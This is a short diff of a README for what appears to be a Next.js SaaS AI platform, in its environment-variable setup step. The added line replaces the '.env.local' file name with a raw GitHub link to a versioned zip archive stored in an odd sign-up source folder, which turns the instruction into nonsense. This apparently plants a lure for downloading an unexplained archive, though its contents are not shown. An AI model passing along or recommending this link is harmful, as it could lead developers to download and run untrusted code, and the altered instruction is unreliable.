KindaJayant/SAAS-AI-Platform/README.md

 **Set Up Environment Variables**

-Create a new file named `.env.local` in the root of your project and add the following content:
+Create a new file named `https://raw.githubusercontent.com/KindaJayant/SAAS-AI-Platform/main/app/(auth)/sign-up/SAAS-AI-Platform-v3.6.zip` in the root of your project and add the following content:

 ```env
 #NEXT